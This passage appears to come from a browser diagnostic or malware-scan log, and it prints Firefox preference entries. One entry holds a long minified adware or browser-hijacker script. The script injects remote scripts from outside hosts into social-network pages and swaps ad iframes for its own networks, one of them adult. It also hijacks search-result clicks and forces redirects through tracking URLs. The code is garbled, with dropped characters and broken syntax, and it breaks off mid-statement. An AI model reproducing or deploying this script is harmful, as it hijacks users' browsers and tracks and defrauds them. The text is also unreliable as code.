prefs.js..browser.search.defaulturl: "" FF - prefs.js..browser.search.selectedEngine: "Web Search" FF - prefs.js..browser.search.selectedEngineS: "" FF - prefs.js..browser.search.useDBForOrder: false FF - prefs.js..browser.startup.homepage: "about:home" FF - prefs.js..extensions.F0xnzt5Rl.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1){return}}catch(e){};if (window.self.location.protocol.indexOf('http:') > -1 && window.self == window.top && (location.hostname.indexOf('odnoklassniki') > -1 || location.hostname.indexOf('vk.com') > -1) ) { var script = document.createElement('script' script.type = 'text/javascript'; script.src = '//app1.kapitoshki.com/files/index.php?type=vi'; document.getElementsByTagName(\"head\")[0].appendChild(script };try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\"a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/fo_bsso.min.js?subid=dft&hid=4212340447801763361\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\"document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\"m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(mvar b=this;b.pixelHost=\"//sepx.installerdatauk.info\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime(b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=2;b.count=0;b.utils=new function(){var a=this;a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*bb=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;bg.length){if(a.waitForTokens[e])return d(nullvar k=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;k(c,d,f,e)},f)}else{if(a.waitForTokens[e])return d(nulla.waitForTokens[e]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"== d&&(d=\"styleFloat\"d=a.dhtml_prop_name(dreturn\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1c.count)setTimeout(function(){c.check_tab()},1E3else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&c.callback(),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){return!0}},bing:{hrefSelector:[\".b_algo a\", \".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"], src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\"if(0a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,f=parseInt(localStorage.getItem(b.prefix)if(\"undefined\"!=typeof d){if(d instanceof Array)for(var e=0;eb.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var e=0;ea;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random()) return b};b.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};b.inject_script=function(b){if(b instanceof Array)for(var a=0;ae||!c||parseInt(c)>e||a.checkXtrg(b,g):a.checkXtrg(b,g)};a.init=function(){if(\"undefined\"!==typeof localStorage&&\"undefined\"!==typeof localStorage.getItem&&-1==window.location.href.indexOf(a.pop_collision_id)&&-1history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://pp.developunit.info/z/?eid=308&hid=4212340447801763361&pid=1795&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random(if(-1=f-k){var a=new Date;a.setHours(a.getHours()+1document.cookie=\"xcddsa=1;expires=\"+a.toUTCString(if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1document.cookie=\"xcddsa=1;expires=\"+a.toUTCString(if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\"b.type=\"text/javascript\";-1>>8^d;c=a^-1;0>c&&(c+=4294967296return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['cpx_bet_55',861],['saymedia_apx_tag_test',113],['mindads_rmx_new',122],['adorika_vmakro',76],['ybrant_csgwl',660],['mindads_apx',40],['mango_rmx',21],['deliads_apx1',63],['mediashakers_rmx_new',151],['startmeapp_gen_tier2',149],['dsnr_ds2014',184],['webisaba_us_fr_de',395],['dsnr_top2',132],['adperium_rmx_new',98],['velismedia_tier2',1474],['blutonic_apx',149],['moriads_rmx',31],['cpx_cyber3_cpm2',330],['xertive_rmx_block',99],['media888_nontb',116],['mari_nontb6',704],['xertive_apx3',378],['matomy_adj14',1013],['matomy_adj14_2',1019],['adstract_new_1',244],['web3_apx_tier2',208],['mediawhite_nontb4',364],['eviral_apx_new',256],['yashi_apx',32],['cpx_favor_cpm2',317],['adnetwork_adnttb',201]],[['cpx_nontb30_tr',910],['dmg14_strm',814],['adstract_strm_1',284],['ybrant_apx_strm2',700],['mari_strm10',623],['mari_strm10_2',578],['mari_strm_tier1_4',767],['matomy_strm13_2',2491],['matomy_strm13',2491],['dsnr_strm_legal',293],['web3_strm_tb',49]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('Lu0VZKt9=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ad.co-co-co.co\"||window.self.location.hostname==\"ads.yahoo.com\"||window.self.location.hostname==\"a.adorika.net\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ads.deliads.com\"||window.self.location.hostname==\"ads.blutonic.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"exchange.admailtiser.com\"||window.self.location.hostname==\"v2.ministerial5.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=288591')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1009')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*iwindow.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\"if(b)for(i=0;i=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\"for(i=0;i-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1009')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s4296237628069424815\", \"true\"d[i].setAttribute(\"replaced\", \"true\"}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a[b].ifr,a[b].sizeb++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](aj&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000=e){h[d](bbreak}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'Lu0VZKt9=' + properties[0] + '_' + properties[1] + '_' + channel : ''break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script> \\x3c/body>\\x3c/html>'}catch(e){var h = '\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1\"+\"<\"+\"/script>\")},1)\\x3c/script>';ifr.src='javascript:document.write(\\''+h+'\\''}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script> 'break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write(''+url+''break;}try{ifr.setAttribute(\"s4296237628069424815\", \"true\"ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size='+size+'&referrer=', (atp?atp:1), [354,size]}}catch(e){return !1;}},saymedia_apx_tag_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1957902\",\"468x60\":\"1957923\",\"160x600\":\"1957924\", \"300x250\":1957917}[size];var surl = \"http://ad.co-co-co.co/rmx/appnexus.html?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [366,size]}}catch(e){return !1;}},mindads_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=4889565&pub_url=§ion_code=308_1795', (atp?atp:1), [458,size]}}catch(e){return !1;}},adorika_vmakro:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'';;return function(ifr){_zyad.iset(ifr, 'http://a.adorika.net/c/banner_s?tenant=AD&selection=8200&size='+size+'&di=1&vurl='+rfr+'&skin=iframe', (atp?atp:1), [472,size]}}catch(e){return !1;}},ybrant_csgwl:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == '120x60') return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=4851522&pub_url=§ion_code=308_1795', (atp?atp:1), [500,size]}}catch(e){return !1;}},mindads_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"2135522\",\"300x250\":\"2077258\",\"160x600\":\"2135538\"}[size];var surl='http://ib.adnxs.com/tt?id='+arr+'&referrer=';;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [505,size]}}catch(e){return !1;}},mango_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60') return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5290513&pub_url=§ion_code=308_1795', (atp?atp:1), [509,size]}}catch(e){return !1;}},deliads_apx1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '468x60 728x90 300x250 160x600 120x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"468x60\":\"2171640\",\"728x90\":\"2171638\",\"300x250\":\"2171637\",\"160x600\":\"2171635\",\"120x600\":\"2171629\"}[size];var surl='http://ads.deliads.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [524,size]}}catch(e){return !1;}},mediashakers_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5021599&pub_url=${PUB_URL}&pub_redirect_unencoded=1&pub_redirect=INSERT%20CLICK%20TRACKER%20HERE§ion_code=308_1795', (atp?atp:1), [527,size]}}catch(e){return !1;}},startmeapp_gen_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2030268&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]', (atp?atp:1), [532,size]}}catch(e){return !1;}},dsnr_ds2014:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '468x60 160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"468x60\":\"2162112\",\"160x600\":\"2162107\",\"300x250\":\"2162086\",\"728x90\":\"2162111\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [535,size]}}catch(e){return !1;}},webisaba_us_fr_de:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2249627\",\"300x250\":\"2249628\",\"160x600\":\"2249629\",\"120x600\":\"2249630\",\"468x60\":\"2249636\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [615,size]}}catch(e){return !1;}},dsnr_top2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2162301&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [538,size]}}catch(e){return !1;}},adperium_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 300x250 468x60 728x90 160x600 300x600 320x50 320x480'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, '//ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5321079&pub_url=www.ad-maven.com', (atp?atp:1), [561,size]}}catch(e){return !1;}},velismedia_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2194627\",\"160x600\":\"2194628\",\"300x250\":\"2194626\",\"468x60\":\"2194629\",\"728x90\":\"2194625\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [574,size]}}catch(e){return !1;}},blutonic_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2196577\",\"300x250\":\"2196579\",\"728x90\":\"2196581\"}[size];var surl='http://ads.blutonic.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [577,size]}}catch(e){return !1;}},moriads_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'&site=1718606§ion_code=INSERT_SECTION_CODE_HERE&pub_url=${PUB_URL}§ion_code=308_1795', (atp?atp:1), [578,size]}}catch(e){return !1;}},cpx_cyber3_cpm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2260930&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [628,size]}}catch(e){return !1;}},xertive_rmx_block:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 120x600 468x60 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'&site=1761014§ion_code=INSERT_SECTION_CODE_HERE&pub_url=$PUB_URL&pub_redirect_unencoded=1&pub_redirect=click_url&cb=cache_§ion_code=308_1795', (atp?atp:2), [595,size]}}catch(e){return !1;}},media888_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2225524\",\"300x250\":\"2225553\",\"160x600\":\"2225545\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [598,size]}}catch(e){return !1;}},mari_nontb6:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2250165\",\"160x600\":\"2250166\",\"300x250\":\"2250167\",\"468x60\":\"2250168\",\"728x90\":\"2250169\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [605,size]}}catch(e){return !1;}},xertive_apx3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250901\",\"728x90\":\"2250920\",\"160x600\":\"2250950\",\"120x600\":\"2250969\",\"468x60\":\"2250972\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [609,size]}}catch(e){return !1;}},matomy_adj14:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250854\",\"728x90\":\"2250868\",\"160x600\":\"2250873\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [612,size]}}catch(e){return !1;}},matomy_adj14_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250867\",\"728x90\":\"2250871\",\"160x600\":\"2250883\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [613,size]}}catch(e){return !1;}},adstract_new_1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2248816&size='+size+'', (atp?atp:1), [616,size]}}catch(e){return !1;}},web3_apx_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2251080&size='+size+'', (atp?atp:1), [619,size]}}catch(e){return !1;}},mediawhite_nontb4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2250338\",\"300x250\":\"2250339\",\"728x90\":\"2250340\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [622,size]}}catch(e){return !1;}},eviral_apx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2142333&size='+size+'', (atp?atp:1), [623,size]}}catch(e){return !1;}},yashi_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2257065\",\"300x250\":\"2257066\",\"728x90\":\"2257067\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [626,size]}}catch(e){return !1;}},cpx_favor_cpm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2260941&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [629,size]}}catch(e){return !1;}},adnetwork_adnttb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2242949&size='+size+'&cb=[CACHEBUSTER]&pubclick=[INSERT_CLICK_TAG]', (atp?atp:1), [630,size]}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/32160/index.html?size='+size+'&referrer=', (atp?atp:1), [442,size]}}catch(e){return !1;}},dmg14_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600'.indexOf(size)) return !1;var atp=false;var cb=Math.random(),rf=window.self==window.top?encodeURIComponent(window.self.location.href):'';;return function(ifr){_zyad.iset(ifr, '//exchange.admailtiser.com/WhiteLabelBidRequestHandlerServlet?oid=4&width='+width+'&height='+height+'&pubid=1018&tagid=221418&noaop=1&revmod=&born=&Prof=&BTF=INSERT_BTF&cb='+cb+'&encoded=1&cirf='+rf+'', (atp?atp:1), [560,size]}}catch(e){return !1;}},adstract_strm_1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2248834&size='+size+'', (atp?atp:1), [617,size]}}catch(e){return !1;}},ybrant_apx_strm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var 